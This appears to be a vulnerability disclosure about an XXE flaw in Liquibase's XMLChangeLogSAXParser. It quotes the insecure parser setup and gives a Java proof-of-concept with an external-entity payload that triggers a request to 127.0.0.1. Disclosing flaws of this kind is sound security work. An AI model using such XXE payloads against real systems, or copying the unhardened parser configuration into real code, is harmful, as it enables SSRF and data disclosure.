The XMLChangeLogSAXParser() function makes use of SAXParser generated from a SAXParserFactory with no FEATURE_SECURE_PROCESSING set, allowing for XXE attacks. In https://github.com/liquibase/liquibase/blob/6f3bb08572b2dcec2d8220b10d49ceb64c4d800a/liquibase-core/src/main/java/liquibase/parser/core/xml/XMLChangeLogSAXParser.java#L24-L27
public XMLChangeLogSAXParser() {
saxParserFactory = SAXParserFactory.newInstance();
saxParserFactory.setValidating(true);
saxParserFactory.setNamespaceAware(true);
}
Which is used in parseToNode()
XMLReader xmlReader = parser.getXMLReader();
xmlReader.setEntityResolver(resolver);
xmlReader.setContentHandler(contentHandler);
xmlReader.parse(new InputSource(new BomAwareInputStream(inputStream)));
Extracted out the key function mentioned above to showcase how it can be exploited.
import javax.xml.parsers.SAXParser;
import javax.xml.parsers.SAXParserFactory;
import org.xml.sax.HandlerBase;
import java.io.ByteArrayInputStream;
public class Poc {
public static void main(String[] args) {
try {
String xmlpoc = "<?xml version=\"1.0\"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM \"http://127.0.0.1/\">]><foo>&xxe;</foo>";
SAXParser saxParser = SAXParserFactory.newInstance().newSAXParser();
saxParser.parse(new ByteArrayInputStream(xmlpoc.getBytes()), new HandlerBase());
} catch (Exception e) {
e.printStackTrace();
}
}
}
Causes an SSRF to http://127.0.0.1
This vulnerability is capable of XXE to disclose data/conduct SSRF attacks etc.